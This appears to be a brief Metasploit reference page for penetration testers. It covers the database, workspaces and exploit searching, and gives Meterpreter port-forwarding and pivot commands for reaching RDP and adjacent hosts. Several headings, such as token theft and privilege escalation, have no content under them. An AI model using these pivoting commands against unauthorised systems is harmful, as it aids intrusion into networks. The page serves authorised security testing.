Metasploit
General Info
Metasploit is a penetration testing framework developed by Rapid7. It has built-in support for exploits, payloads and its own extended shell system called Meterpreter.
Commands
These commands are adapted from the Metasploit Cheat Sheet created by TunnelsUp. Check it out here!
General
Using the database
The Metasploit database saves data found during exploitation. Auxiliary scan results, hashdumps, and credentials show up in the database. For separate assignments, try using Workspaces (see below).
First Time Setup
Commands
Exploit handling
Finding an Exploit to use
First, gather information using db_nmap and auxiliary modules. Auxiliary modules have numerous scanners, gatherers, fuzzers, and tools that allow you to scan a CIDR block or single IP and will save the results in the database.
Once information is gathered on the host, look at the results: What OS is running, what services were found? Use the search
command to find suitable exploits or modules for further enumeration.
Executing an Exploit
Sessions
Meterpreter
General commands
Privilege Escalation
Windows Access Token Theft
Port forwarding / pivoting
Enable port forwarding, opening port 3388 locally which forwards all traffic to 3389 on remote host:
portfwd [ADD|DELETE] -L <LHOST> -l 3388 -r <RHOST> -p 3389
Pivot through a session by adding a route within msf, it allows you to exploit or scan adjacent hosts
route add <SUBNET> <MASK> <SESSIONID>
Workspaces
Each workspace acts like a separate database. Need a fresh DB? Create a new workspace.
Last updated